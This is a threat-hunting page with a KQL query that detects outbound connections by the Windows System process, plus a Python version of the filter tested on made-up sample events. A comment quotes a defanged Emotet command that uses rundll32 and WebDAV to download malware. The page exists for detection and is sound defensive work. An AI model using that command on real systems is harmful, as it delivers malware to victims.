Query Details

System Process Net Cons

Query

// System creating network connections could be many things
// A common TTP associated with this traffic is exploiting WebDAV to download malware
// emotet example:
// rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 127.0.0.1 hxxp://127.0.0[.]1/$/users/public/malware[.]exe
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "System"
| where ActionType == "ConnectionSuccess"
// exclude local IPs
| where not(ipv4_is_private(RemoteIP))  // RFC 1918 private ranges
| where RemoteIP !startswith "169.254." // DHCP failed, default link-local
| where RemoteIP !startswith "127."     // loopback
| where RemoteIP != "::1"               // loopback
// other exclusions
//| where RemoteIP !startswith "X.X." // Your org's public IPs

Explanation

This query looks for successful network connections whose initiating process is the Windows System process. It filters out connections to RFC 1918 private addresses, the 169.254.0.0/16 link-local range, and the IPv4 (127.0.0.0/8) and IPv6 (::1) loopback addresses. A commented-out line can be enabled to exclude your organization's own public IP ranges as well.
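To test the same filter logic offline, here is an added Python example (not the page's query or its author's code) that applies the query's conditions to constructed DeviceNetworkEvents-shaped rows. It mirrors the KQL: case-insensitive match on InitiatingProcessFileName (the =~ operator), ActionType == "ConnectionSuccess", and exclusion of RFC 1918, link-local and loopback remote addresses, with the "your org's public IPs" exclusion exposed as a parameter. It goes beyond the query in one respect: KQL's ipv4_is_private() only evaluates RFC 1918 ranges and yields null for a non-IPv4 string, so the function below checks those ranges explicitly instead of using Python's broader is_private, and it also treats IPv6 unique-local (fc00::/7) and link-local (fe80::/10) addresses as local. All sample rows, addresses and prefixes are constructed.

```python
import ipaddress

# Ranges KQL's ipv4_is_private() checks (RFC 1918).
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IPV4_LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")  # DHCP failed, default link-local
# IPv6 equivalents the KQL query does not cover (assumption: treat these as local too).
IPV6_LOCAL = [ipaddress.ip_network(n) for n in ("fc00::/7", "fe80::/10")]

# Constructed sample rows shaped like DeviceNetworkEvents (not real telemetry).
SAMPLE_EVENTS = [
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionSuccess", "RemoteIP": "10.0.0.5", "RemotePort": 445},
    {"InitiatingProcessFileName": "system", "ActionType": "ConnectionSuccess", "RemoteIP": "203.0.113.10", "RemotePort": 80},
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionFailed", "RemoteIP": "203.0.113.11", "RemotePort": 80},
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionSuccess", "RemoteIP": "169.254.1.1", "RemotePort": 80},
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionSuccess", "RemoteIP": "127.0.0.1", "RemotePort": 80},
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionSuccess", "RemoteIP": "::1", "RemotePort": 80},
    {"InitiatingProcessFileName": "svchost.exe", "ActionType": "ConnectionSuccess", "RemoteIP": "203.0.113.12", "RemotePort": 443},
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionSuccess", "RemoteIP": "172.31.4.2", "RemotePort": 445},
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionSuccess", "RemoteIP": "198.51.100.7", "RemotePort": 80},
    {"InitiatingProcessFileName": "System", "ActionType": "ConnectionSuccess", "RemoteIP": "2001:db8::1", "RemotePort": 80},
]


def is_excluded_remote(remote_ip, org_public_prefixes=()):
    """Return True when the remote address is local/private (or an org public
    prefix) and should be filtered out, mirroring the query's where clauses."""
    try:
        addr = ipaddress.ip_address(remote_ip)
    except ValueError:
        # An unparsable address would make the KQL predicate null, and a null
        # predicate does not pass a where clause, so drop it here as well.
        return True
    if addr.is_loopback:  # 127.0.0.0/8 and ::1
        return True
    if addr.version == 4:
        if any(addr in net for net in RFC1918) or addr in IPV4_LINK_LOCAL:
            return True
    else:
        if any(addr in net for net in IPV6_LOCAL):
            return True
    # Optional "your org's public IPs" exclusion (the commented-out KQL line).
    return any(addr in ipaddress.ip_network(p) for p in org_public_prefixes)


def system_process_net_cons(events, org_public_prefixes=()):
    """Apply the query's filter to an iterable of event dicts and return the hits."""
    hits = []
    for event in events:
        # =~ in KQL is a case-insensitive string comparison.
        if event.get("InitiatingProcessFileName", "").lower() != "system":
            continue
        if event.get("ActionType") != "ConnectionSuccess":
            continue
        if is_excluded_remote(event.get("RemoteIP", ""), org_public_prefixes):
            continue
        hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in system_process_net_cons(SAMPLE_EVENTS, org_public_prefixes=("198.51.100.0/24",)):
        print(hit["RemoteIP"], hit["RemotePort"])
```

Run against the constructed rows, only the successful System connections to 203.0.113.10, 198.51.100.7 and 2001:db8::1 survive; passing your own public prefixes as org_public_prefixes removes 198.51.100.7 as the commented-out KQL line would. Triage of what remains still requires looking at the host, since the System process making outbound connections is also normal for SMB and WebDAV client traffic.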

Details


C.J. May

Released: May 16, 2023

Tables

DeviceNetworkEvents

Keywords

DeviceNetworkEvents

Operators

where, =~, ==, not, ipv4_is_private, !startswith, !=
